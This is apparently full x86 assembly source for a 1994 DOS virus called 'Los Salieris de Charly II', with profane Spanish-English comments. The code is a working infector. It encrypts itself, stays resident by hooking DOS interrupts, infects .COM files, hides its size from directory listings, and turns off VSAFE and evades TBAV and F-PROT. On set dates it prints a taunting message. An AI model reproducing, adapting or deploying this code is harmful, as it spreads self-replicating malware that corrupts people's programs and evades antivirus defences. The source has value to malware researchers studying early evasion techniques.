; ; Virus Los Salieris de Charly II (para compilar normal). ; (Stealth with TBAV, VSAFE, DIR, NC and MEM) ; ; Created by: Ramthes Jones'94 (For Those About to Rock!! ; (AHORA SI QUE EL TBAV ME LA CHUPA BIEN!!!) ; ; Fuente de mierda! hasta donde pensas llegar? porque estos gatos ; solo hablan en ingles... grrr! desencriptan pero no traducen. ; ; DANGER!!: What you're gonna read could be bad for your health! ; Please! try to understand... my prgs don't run... ; they creep >:-D he he he! ; CODE SEGMENT .286c ASSUME CS:CODE, DS:CODE, ES:CODE ORG 100h START: JMP COMIENZO NOP NOP NOP INT 20h COMIENZO: ONE LABEL BYTE INT 03h ; This piece o'shit's for TBAV :( ::: MOV BX,0107h PUSH BX MOV AH,0Dh ; ??? What?????????! MOV CX,(OFFSET INCRIPT - OFFSET ONE) - (OFFSET DESDE_ACA - OFFSET ONE) MOV SI,(OFFSET DESDE_ACA - OFFSET ONE) ADD SI,BX DESENCRIPTO: MOV DL,CS:[((NUMERO - OFFSET ONE) + BX)] XOR [SI],DL INC SI XOR AH,AH ; This shit's for F-PROT INT 02h ; This shit's for TBAV LOOP DESENCRIPTO JMP DESDE_ACA INT 21h MOV AX,4C00h INT 21h DESDE_ACA: MOV AX,0CACAh INT 21h CMP AX,0FEDEh JE CORRE_PROG_1 JMP CHUPAMELA CORRE_PROG_1: JMP CORRE_PROG CHUPAMELA: PUSH AX PUSH DX MOV AX,0FA01h MOV DX,5945h INT 21h POP DX POP AX MOV AH,4Ah XOR BX,BX INT 21h MOV AH,4Ah MOV BX,0FFFFh INT 21h SUB BX,101h MOV AH,4Ah INT 21h MOV AH,48h MOV BX,100h INT 21h MOV ES,AX PUSH ES DEC AX MOV ES,AX MOV ES:WORD PTR [0001h], 0008h POP ES PUSH CS POP DS POP SI PUSH SI XOR DI,DI MOV CX,OFFSET TWO - OFFSET ONE CLD REP MOVSB PUSH ES POP DS MOV AX,3521h INT 21h POP SI PUSH SI MOV DS:[INT21IP - OFFSET ONE],BX MOV DS:[INT21CS - OFFSET ONE],ES MOV AX,2521h MOV DX,(OFFSET HOOK_21 - OFFSET ONE) INT 21h MOV AH,04h INT 1Ah CMP DX,0526h JE JODE_2 CMP DX,1126h JE JODE_2 CMP DX,1021h JE JODE_2 JMP NO_JODE JODE_2: MOV AX,3513h INT 21h MOV DS:[INT17IP - OFFSET ONE],BX MOV DS:[INT17CS - OFFSET ONE],ES MOV AX,2513h MOV DX,(OFFSET HOOK_13 - OFFSET ONE) INT 21h NO_JODE: PUSH CS PUSH CS POP DS POP ES CORRE_PROG: POP BX MOV DI,100h LEA SI,[(NORMAL - OFFSET ONE) + BX] MOVSW MOVSB PUSH CS PUSH 0100h RETF HOOK_21 PROC FAR PUSH DS PUSHF PUSH AX PUSH BX PUSH CX PUSH DX PUSH SI PUSH DI PUSH DS PUSH ES CMP AX,0CACAh JE RESIDE CMP AH,4Bh JE INFECTA1 CMP AH,3Dh JE INFECT_FAST1 CMP AH,4Eh JE NO_NC CMP AH,4Fh JE NO_NC CMP AH, 11h JE NO_DIR CMP AH, 12h JE NO_DIR JMP FIN INFECTA1: JMP INFECTA INFECT_FAST1: JMP INFECT_FAST RESIDE: POP ES POP DS POP DI POP SI POP DX POP CX POP BX POP AX POPF POP DS MOV AX,0FEDEh IRET NO_DIR PROC POP ES POP DS POP DI POP SI POP DX POP CX POP BX POP AX POPF POP DS PUSH CX PUSH BX PUSH ES PUSH AX MOV AH,2Fh PUSHF CALL DWORD PTR CS:[INT21IP - OFFSET ONE] POP AX PUSHF CALL DWORD PTR CS:[INT21IP - OFFSET ONE] PUSH AX PUSHF OR AL,AL JNE FINHANDLER2 CMP BYTE PTR ES:[BX],0FFh JNE NOEXTENDED ADD BX,07h NOEXTENDED: MOV CX,ES:[BX+17h] AND CL,00011111b CMP CL,00001101b JNE FINHANDLER2 SUB WORD PTR ES:[BX+1Dh],OFFSET TWO - OFFSET ONE ;LE RESTO EL VALOR DEL PRG SBB WORD PTR ES:[BX+1Fh],0 FINHANDLER2: POPF POP AX POP ES POP BX POP CX RETF 0002h NO_DIR ENDP NO_NC PROC POP ES POP DS POP DI POP SI POP DX POP CX POP BX POP AX POPF POP DS PUSHF CALL DWORD PTR CS:[INT21IP - OFFSET ONE] PUSHF PUSH AX PUSH BX PUSH CX PUSH ES MOV AH,2Fh PUSHF CALL DWORD PTR CS:[INT21IP - OFFSET ONE] MOV CX,ES:[BX+16h] AND CL,00011111b CMP CL,00001101b JE SI_RECUBRO JMP NO_RECUBRO SI_RECUBRO: SUB WORD PTR ES:[BX+1Ah],OFFSET TWO - OFFSET ONE ;LE RESTO EL VALOR DEL PRG NO_RECUBRO: POP ES POP CX POP BX POP AX POPF RETF 2 NO_NC ENDP FIN_1: JMP FIN INFECT_FAST: MOV SI,DX BUCLE: CMP BYTE PTR [SI],"." JE YASTA CMP BYTE PTR [SI],00h JE FIN_1 INC SI JMP BUCLE YASTA: PUSH SI BUCLE2: CMP BYTE PTR [SI],"\" JE YASTA2 CMP SI,DX JNE NOSTA2 DEC SI JMP YASTA2 NOSTA2: DEC SI JMP BUCLE2 YASTA2: INC SI MOV AX,[SI] OR AX,2020h CMP AX,"oc" JNE DALEPUES INC SI INC SI MOV AX,[SI] OR AX,2020h CMP AX,"mm" JNE DALEPUES POP SI JMP FIN_1 DALEPUES: POP SI INC SI MOV AX,[SI] OR AX,2020h CMP AX,"oc" JNE FIN_1 INFECTA: PUSH AX PUSH BX PUSH DX PUSH DS PUSH ES MOV AX, CS MOV DS, AX MOV AX,3524h PUSHF CALL DWORD PTR DS:[INT21IP - OFFSET ONE] MOV DS:[INT24IP - OFFSET ONE],BX MOV DS:[INT24CS - OFFSET ONE],ES MOV AX,2524h MOV DX,(OFFSET HOOK_24 - OFFSET ONE) PUSHF CALL DWORD PTR DS:[INT21IP - OFFSET ONE] POP ES POP DS POP DX POP BX POP AX PUSH DX PUSH DX CALL REMUEVE_BITS POP DX MOV AX,4300h PUSHF CALL DWORD PTR CS:[INT21IP - OFFSET ONE] MOV CS:[(ATRIBUTOS - OFFSET ONE)],CX MOV AX,4301h MOV CX,20h PUSHF CALL DWORD PTR CS:[INT21IP - OFFSET ONE] JC FINAL_1 MOV AX,3D02h PUSHF CALL DWORD PTR CS:[INT21IP - OFFSET ONE] PUSH AX POP BX MOV AH,3Fh MOV CX,2 PUSH CS POP DS MOV DX,(OFFSET NORMAL - OFFSET ONE) PUSHF CALL DWORD PTR CS:[INT21IP - OFFSET ONE] XOR SI,SI MOV AL,CS:(NORMAL - OFFSET ONE)[SI] CMP AL,'M' JE FINAL_1 INC SI MOV AL,CS:(NORMAL - OFFSET ONE)[SI] CMP AL,'Z' JE FINAL_1 JMP CONTI FINAL_1: JMP FINAL CONTI: MOV AX,5700h PUSHF CALL DWORD PTR CS:[INT21IP - OFFSET ONE] MOV CS:[(HORA - OFFSET ONE)],CX MOV CS:[(FECHA - OFFSET ONE)],DX AND CL,00011111b ; Esto es lo correcto para comprobar CMP CL,00001101b ; si los segundos son 26 JE FINAL_1 MOV AX,4200h CWD MOV CX,DX PUSHF CALL DWORD PTR CS:[INT21IP - OFFSET ONE] MOV AH,3Fh MOV CX,3 PUSH CS POP DS MOV DX,(OFFSET NORMAL - OFFSET ONE) PUSHF CALL DWORD PTR CS:[INT21IP - OFFSET ONE] MOV AX,4202h CWD MOV CX,DX PUSHF CALL DWORD PTR CS:[INT21IP - OFFSET ONE] PUSH AX SUB AX,3 MOV SI,1 MOV CS:(BUFFER - OFFSET ONE)[SI],AL INC SI MOV CS:(BUFFER - OFFSET ONE)[SI],AH ; PUSH AX ;MIERDA1 MOV AH,2Ch PUSHF CALL DWORD PTR CS:[INT21IP - OFFSET ONE] MOV CS:[NUMERO - OFFSET ONE],DL PUSH BX MOV AH,48h MOV BX,150h PUSHF CALL DWORD PTR CS:[INT21IP - OFFSET ONE] MOV ES,AX POP BX PUSH CS POP DS XOR SI,SI MOV DI,SI MOV CX,OFFSET TWO - OFFSET ONE CLD REP MOVSB PUSH ES POP DS POP AX ;LL INC AH XOR SI,SI ;LL MOV ES:[SI + 2],AL ;OPA MOV ES:[SI + 3],AH MOV CX,(OFFSET INCRIPT - OFFSET ONE) - (OFFSET DESDE_ACA - OFFSET ONE) MOV SI,(OFFSET DESDE_ACA - OFFSET ONE) ENCRIPTO: XOR [SI],DL INC SI LOOP ENCRIPTO MOV AH,40h MOV CX,OFFSET TWO - OFFSET ONE XOR DX,DX PUSH ES POP DS PUSHF CALL DWORD PTR CS:[INT21IP - OFFSET ONE] JC FINAL MOV AH,49h PUSHF CALL DWORD PTR CS:[INT21IP - OFFSET ONE] MOV AX,4200h CWD MOV CX,DX PUSHF CALL DWORD PTR CS:[INT21IP - OFFSET ONE] MOV AH,40h MOV CX,3 MOV DX,(OFFSET BUFFER - OFFSET ONE) PUSH CS POP DS PUSHF CALL DWORD PTR CS:[INT21IP - OFFSET ONE] MOV AX,5701h MOV CX,CS:[(HORA - OFFSET ONE)] AND CL,11100000b OR CL,00001101b MOV DX,CS:[(FECHA - OFFSET ONE)] PUSHF CALL DWORD PTR CS:[INT21IP - OFFSET ONE] FINAL: MOV AH,3Eh PUSHF CALL DWORD PTR CS:[INT21IP - OFFSET ONE] MOV AX,4301h MOV CX,CS:[(ATRIBUTOS - OFFSET ONE)] POP DX PUSHF CALL DWORD PTR CS:[INT21IP - OFFSET ONE] CALL RESTAURA_BITS MOV AX,2524h MOV DX,CS:[INT24IP - OFFSET ONE] MOV DS,CS:[INT24CS - OFFSET ONE] PUSHF CALL DWORD PTR CS:[INT21IP-OFFSET ONE] FIN: POP ES POP DS POP DI POP SI POP DX POP CX POP BX POP AX POPF POP DS JMP DWORD PTR CS:[(INT21IP - OFFSET ONE)] HOOK_21 ENDP HOOK_13 PROC PUSHF PUSH AX PUSH BX PUSH CX PUSH SI XOR BX,BX MOV SI,31 MOV CX,75 ESCRIBE: MOV AH,0Eh MOV AL,CS:(TEXTO - OFFSET ONE)[SI] INT 10h INC SI LOOP ESCRIBE POP SI POP CX POP BX POP AX POPF JMP DWORD PTR CS:[(INT17IP - OFFSET ONE)] HOOK_13 ENDP HOOK_24 PROC XOR AL,AL IRET HOOK_24 ENDP V_SAFE PROC MOV AH,0FAh MOV DX,5945h INT 21h RET V_SAFE ENDP VERIFICA_RESIDENCIA PROC XOR AL,AL CALL V_SAFE CMP BX,2F00h JE FORI STC FORI: RET VERIFICA_RESIDENCIA ENDP REMUEVE_BITS PROC CALL VERIFICA_RESIDENCIA JC FORI_1 MOV AL,02h MOV BL,00000000b CALL V_SAFE MOV CS:[SEBA-OFFSET ONE],CL FORI_1: CLC RET REMUEVE_BITS ENDP RESTAURA_BITS PROC CALL VERIFICA_RESIDENCIA JC FORI_2 MOV AL,02 MOV BL,CS:[SEBA-OFFSET ONE] CALL V_SAFE FORI_2: CLC RET RESTAURA_BITS ENDP INT21IP DW 0 INT21CS DW 0 INT24IP DW 0 INT24CS DW 0 INT17IP DW 0 INT17CS DW 0 ATRIBUTOS DW 0 SEBA DB 1 HORA DW 0 FECHA DW 0 BUFFER DB 3 DUP(0E9h) NORMAL DB 3 DUP(90h) TEXTO DB "VIRUS LOS SALIERIS DE CHARLY 2." DB "AIN'T A HACKER," DB "AIN'T A CRACKER," DB "I AM ONLY A MOTHERFUCKER." DB 'DEDICATED TO "MACA"' INCRIPT LABEL BYTE NUMERO DB 1 DUP(0) TWO LABEL BYTE CODE ENDS END START